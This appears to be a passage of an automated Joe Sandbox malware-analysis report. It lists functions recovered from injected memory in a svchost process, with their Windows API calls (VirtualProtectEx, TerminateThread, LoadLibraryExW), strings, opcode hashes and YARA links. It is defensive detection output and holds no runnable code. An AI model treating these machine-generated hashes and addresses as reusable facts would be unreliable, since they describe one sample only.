API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction ID: a28f0207ded7251b2138ce8eaabf7731b6e17eb6dd1893435d04d01492ed5137
Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
Instruction Fuzzy Hash: D781F271704B418AFF50AB6598493F9E3D0BF85788F5C46169A0ACB7B6EB78C8078730

Function 0000014E41FD9DC4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 0000014E41FD9E49
GetLastError.KERNEL32 ref: 0000014E41FD9E57
LoadLibraryExW.KERNEL32 ref: 0000014E41FD9E81
FreeLibrary.KERNEL32 ref: 0000014E41FD9EC7
GetProcAddress.KERNEL32 ref: 0000014E41FD9ED3

Strings

api-ms-, xrefs: 0000014E41FD9E69

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction ID: 03ee9c64fc4e5180bd68ea4e23d85fb7920b7978f1ef5f904570876798f634f1
Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
Instruction Fuzzy Hash: 80317231316A40A1EF169B82A4087E9A3D4BF48BA0F5D46259D1F87BA5DF39C5468330

Function 0000014E41FE3DB4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 0000014E41FE3DE5
GetLastError.KERNEL32 ref: 0000014E41FE3DF1
CloseHandle.KERNEL32 ref: 0000014E41FE3E09
CreateFileW.KERNEL32 ref: 0000014E41FE3E34
WriteConsoleW.KERNEL32 ref: 0000014E41FE3E53

Strings

CONOUT$, xrefs: 0000014E41FE3E15

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction ID: 58d35a48e73ae5a6a2069cbe50502fe36390fdbaf60b5645c7a944c23e30e8f6
Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
Instruction Fuzzy Hash: 86116031318B8486EB608F52E858359B7E0FB88FE4F094225EA5EC77A4DF7CC5168750

Function 0000014E41FD3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000014E41FD379E
GetCurrentProcess.KERNEL32 ref: 0000014E41FD37CC
VirtualProtectEx.KERNEL32 ref: 0000014E41FD37EE
GetCurrentProcess.KERNEL32 ref: 0000014E41FD3809
VirtualProtectEx.KERNEL32 ref: 0000014E41FD382A

Strings

wr, xrefs: 0000014E41FD37FF

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID: wr
API String ID: 1092925422-2678910430
Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction ID: 8310219fc58ae82eb0bcc7bfba685b767ad38c6a0f57641c290d7d667e99c083
Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction Fuzzy Hash: 80115B76708B4582EF549B21E5082A9B7F1FB88B95F490029DF8E877A4EF3DC506C724

Function 0000014E41FD5B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000014E41FD5B6B
GetThreadContext.KERNEL32 ref: 0000014E41FD5CD5

Part of subcall function 0000014E41FD5960: GetCurrentThreadId.KERNEL32 ref: 0000014E41FD5964

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction ID: 07ea2566a821138ba5b41bcd2566ad333a6cc9f6e2a32e52345a153ce6aaa6b8
Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
Instruction Fuzzy Hash: 61D18D76209B8881DE709B16E4943AAB7F0F788B84F144216EACE87B75DF7CC552CB50

Function 0000014E41FD2F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000014E41FD2F27
HeapAlloc.KERNEL32 ref: 0000014E41FD2F3A
StrCmpNIW.SHLWAPI ref: 0000014E41FD2FAF
GetProcessHeap.KERNEL32 ref: 0000014E41FD3015
HeapFree.KERNEL32 ref: 0000014E41FD3023

Strings

dialer, xrefs: 0000014E41FD2FA8

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction ID: 64828584eb3bfdbaceddc1153c386e701d38d80c8c2db94475a50a70e660af8b
Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
Instruction Fuzzy Hash: 48317832705B5582FF15CF56A9487AAA7E0BF44B94F0C85249E4A87B65EB38C4A38360

Function 0000014E41FD14A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000014E41FD14C5
HeapFree.KERNEL32 ref: 0000014E41FD14D4
GetProcessHeap.KERNEL32 ref: 0000014E41FD14E1
HeapFree.KERNEL32 ref: 0000014E41FD14F0
GetProcessHeap.KERNEL32 ref: 0000014E41FD1500

Strings

C:\Windows\system32\svchost.exe, xrefs: 0000014E41FE61A9, 0000014E41FE61B1

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Heap$Process$Free
String ID: C:\Windows\system32\svchost.exe
API String ID: 3168794593-4180442734
Opcode ID: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
Instruction ID: 1ea6c2aa508163f35958e79cb2a9901d7fd2f010a3072b3d942776ec3241fee8
Opcode Fuzzy Hash: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
Instruction Fuzzy Hash: D021917B60CBD88AEB52DF2598592DDABE1FB49F64F0E4016DB45C3363DA2DC4068720

Function 0000014E41FDCFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000014E41FDCFAF
FlsSetValue.KERNEL32(?,?,?,0000014E41FDD6B5,?,?,?,?,0000014E41FDD778), ref: 0000014E41FDCFE5
FlsSetValue.KERNEL32(?,?,?,0000014E41FDD6B5,?,?,?,?,0000014E41FDD778), ref: 0000014E41FDD012
FlsSetValue.KERNEL32(?,?,?,0000014E41FDD6B5,?,?,?,?,0000014E41FDD778), ref: 0000014E41FDD023
FlsSetValue.KERNEL32(?,?,?,0000014E41FDD6B5,?,?,?,?,0000014E41FDD778), ref: 0000014E41FDD034
SetLastError.KERNEL32 ref: 0000014E41FDD04F

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction ID: 4c605ab0eebe7c8a65e16142fd15fb062952cf9a22b794a22443e09c107b39ea
Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
Instruction Fuzzy Hash: 9511063030528042FE64A735955D7F9A3D2BF847F0F1C4729A92BC6AFAEE69C4039620

Function 0000014E41FD199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000014E41FD19C2
K32GetModuleFileNameExW.KERNEL32 ref: 0000014E41FD19E0
PathFindFileNameW.SHLWAPI ref: 0000014E41FD19EF
lstrlenW.KERNEL32 ref: 0000014E41FD19FB
StrCpyW.SHLWAPI ref: 0000014E41FD1A0E
CloseHandle.KERNEL32 ref: 0000014E41FD1A1C

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction ID: 45260b5053477a1902ed5b314b8ddb3b202787d03d162f4498fe3015baeaf19a
Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
Instruction Fuzzy Hash: 0B012931308B4486EB64DB52A85C799A3E5FB88FD4F894035DE4A83765DF3CC98AC760

Function 0000014E41FD36C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000014E41FD36E4
GetCurrentProcess.KERNEL32 ref: 0000014E41FD36F2
VirtualProtectEx.KERNEL32 ref: 0000014E41FD3714
GetCurrentProcess.KERNEL32 ref: 0000014E41FD3732
VirtualProtectEx.KERNEL32 ref: 0000014E41FD3753
TerminateThread.KERNEL32 ref: 0000014E41FD3762

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction ID: 27845c9942124fe15b1c72357d23f614dfff2e05e98621f38ac1f8b99baeb5ad
Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
Instruction Fuzzy Hash: 44011B75315B4482FF259B61E81C3A9A7F1BF45B96F090429CA4E87774EF3DC10A8720

Function 0000014E41FD9005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000014E41FD9013
_IsNonwritableInCurrentImage.LIBCMT ref: 0000014E41FD90A8
RtlUnwindEx.NTDLL ref: 0000014E41FD90F7

Strings

csm, xrefs: 0000014E41FD908E
f, xrefs: 0000014E41FD9026

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: a1bf88d4b9d8004459b5fa9669b2167566428502909aa59e78964a9a5b042688
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: 8951D63270160186EF14DF75E44CBB9B7D6FB45B98F598128DA1B83BA8DB75C842C720

Function 0000014E41FD8FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000014E41FD9013
_IsNonwritableInCurrentImage.LIBCMT ref: 0000014E41FD90A8
RtlUnwindEx.NTDLL ref: 0000014E41FD90F7

Strings

csm, xrefs: 0000014E41FD908E
f, xrefs: 0000014E41FD9026

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: 6bc827c4c3bb3e0c98ca9239eca2c50e04eb8a87f0c80140b29f13db2d6fb965
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: 2631D43230074096EF14DF61E84C7A9B7E5FB44B98F098118EE5B83BA9DB39C942C724

Function 0000014E41FD1A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000014E41FD1A60
StrCmpNIW.SHLWAPI ref: 0000014E41FD1A7A
lstrlenW.KERNEL32 ref: 0000014E41FD1A89
StrCpyW.SHLWAPI ref: 0000014E41FD1A9E

Strings

\\?\, xrefs: 0000014E41FD1A6E

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction ID: b12ca8b25fa5122955bb982c68454bcc7e018bb98c49cc1ed73afc7e3ae07854
Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction Fuzzy Hash: 30F0493270874591EF608B51F888799A7E0FB48B98F884120DA4986A64DF3CC64FC710

Function 0000014E41FDBC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000014E41FDBCBD
GetProcAddress.KERNEL32 ref: 0000014E41FDBCD3
FreeLibrary.KERNEL32 ref: 0000014E41FDBCFA

Strings

CorExitProcess, xrefs: 0000014E41FDBCCC
mscoree.dll, xrefs: 0000014E41FDBCB4

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction ID: 035e3789f53f373a927057afabb0f361c24ef996c6f03b6afc748e9683801fc8
Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
Instruction Fuzzy Hash: 9FF06271319B0881EF148F24E44C3A9A3A0FF89775F590319CA6A853F4CF2CC1468760

Function 0000014E41FD3044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000014E41FD3066
StrCpyW.SHLWAPI ref: 0000014E41FD3076
StrCatW.SHLWAPI ref: 0000014E41FD3082
PathCombineW.SHLWAPI ref: 0000014E41FD3090

Strings

\\.\pipe\, xrefs: 0000014E41FD305C

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction ID: cc80a717613b9aef5249e127a8ce4b2df5163e301108ee4070d8aa47fa087152
Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
Instruction Fuzzy Hash: A7F05E70308B8482EF108B12B90C1A9A3A1BF48FE4F0D4120EE4A87B28DE2CC4468720

Function 0000014E41FD50D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000014E41FD5156

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction ID: 742035003ab41573749cbaf50ab97c77026f2c65be4dc385caaa5c533d93989b
Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
Instruction Fuzzy Hash: 7402B432219B8486EB60CB59E4943AAB7F0F7C5794F144116EA8E87BB8DF7CD485CB10

Function 0000014E41FD5710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000014E41FD5726

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction ID: 4debb5f53ed61f6123289aa0e5a7e5e44eede09a84607efc51eced9d514b7eed
Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
Instruction Fuzzy Hash: B561A736619A84C6EB60CB15E44836AB7F0F788784F140216EA8E87BB8DB7CD456CB10

Function 0000014E41FB3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000014E41FB352C
_set_statfp.LIBCMT ref: 0000014E41FB3547
_set_statfp.LIBCMT ref: 0000014E41FB3563
_set_statfp.LIBCMT ref: 0000014E41FB359F

Memory Dump Source

Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: ead154b9435ffe6a454870689a50e6f6704023e04e4d2936ba47f9ea0b1d783b
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 0711A0B2BD0E1351FEA41569E75E3E993C07FD8374F4C8628A966862F7CA28C8474230

Function 0000014E41FE4104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 0000014E41FE412C
_set_statfp.LIBCMT ref: 0000014E41FE4147
_set_statfp.LIBCMT ref: 0000014E41FE4163
_set_statfp.LIBCMT ref: 0000014E41FE419F

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction ID: e72965eb51f99d8a0ac95fcd431345854843bb65debfdf1bdb0de3510e35bf29
Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
Instruction Fuzzy Hash: 6E118F32B58B5011FF665568D45D3E593C17FA83A8E0F062CA976C67F68A2CC9438224

Function 0000014E41FAF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000014E41FAF124

Strings

or copy constructor iterator', xrefs: 0000014E41FAF25A, 0000014E41FAF275
Wednesday, xrefs: 0000014E41FAF1ED
Tuesday, xrefs: 0000014E41FAF0F4

Memory Dump Source

Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: Tuesday$Wednesday$or copy constructor iterator'
API String ID: 3215553584-4202648911
Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction ID: 9afa7e71d04fa23ee4952312235bac51a1d74b63e64a95d112a04740b73905c4
Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
Instruction Fuzzy Hash: 45614C7670064042FE659B65E58C3EEEBE1BF867C0F5D4515DA0A9BFB4EA3CD8438220

Function 0000014E41FDAA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000014E41FDAA68
_CallSETranslator.LIBVCRUNTIME ref: 0000014E41FDAAB7

Strings

MOC, xrefs: 0000014E41FDAA7C
RCC, xrefs: 0000014E41FDAA85

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction ID: 0789a3831c1f6d771d65473aec04d891a6e65c0c978cd43e319f5209d2f070c5
Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
Instruction Fuzzy Hash: F7614833705B848AEB209F65D4443EDB7E0FB84B98F084215EE4A57BA8DB38D596C714

Function 0000014E41FAA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000014E41FAA1A0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000014E41FAA288

Strings

csm, xrefs: 0000014E41FAA2DA
csm, xrefs: 0000014E41FAA1C2

Memory Dump Source

Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 9fc2ac829e4d419cfb4e4e7491d5e77e61521fb2b31f7c138b84e684f10f9101
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: E0516E32200380CAEF648B659548398B7E0FB55BD4F1C4116DA9DC7FA5CB7ED466CB20

Function 0000014E41FDAD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000014E41FDADA0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000014E41FDAE88

Strings

csm, xrefs: 0000014E41FDAEDA
csm, xrefs: 0000014E41FDADC2

Memory Dump Source

Source File: 0000001E.00000002.3324946390.0000014E41FD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FD0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fd0000_svchost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction ID: 321aa2bf97eac6cafb4f774fd1c13e020d27b9bfb404d6bee772e39a7e361af9
Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
Instruction Fuzzy Hash: 54516E722003808AEF648F26D5883A9B7E0FB94B95F1C4255DA9E87BE5CB38D453C718

Function 0000014E41FA8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000014E41FA8413
_IsNonwritableInCurrentImage.LIBCMT ref: 0000014E41FA84A8

Strings

csm, xrefs: 0000014E41FA848E
f, xrefs: 0000014E41FA8426

Memory Dump Source

Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction ID: 0bce45575947cd2407113779943a525e14445a621b98b0471fe801dac2351894
Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
Instruction Fuzzy Hash: C951B4327412008EDF54CB15D40CB98B7E5FB94BE9F9C8124DE8683B6CE7B8D8428724

Function 0000014E41FA83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000014E41FA8413
_IsNonwritableInCurrentImage.LIBCMT ref: 0000014E41FA84A8

Strings

csm, xrefs: 0000014E41FA848E
f, xrefs: 0000014E41FA8426

Memory Dump Source

Source File: 0000001E.00000002.3324776404.0000014E41FA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E41FA0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_14e41fa0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction ID: c159a0ba046949333dfa247496e2d25aa9719a0157f25d5229989bbc026eab31
Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
Instruction Fuzzy Hash: A2319E313416409AEB14DF11E848799B7E4FB44BD9F9D8018EE9B83BA8DB7CD942C724

Function 0000014E41FE2058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

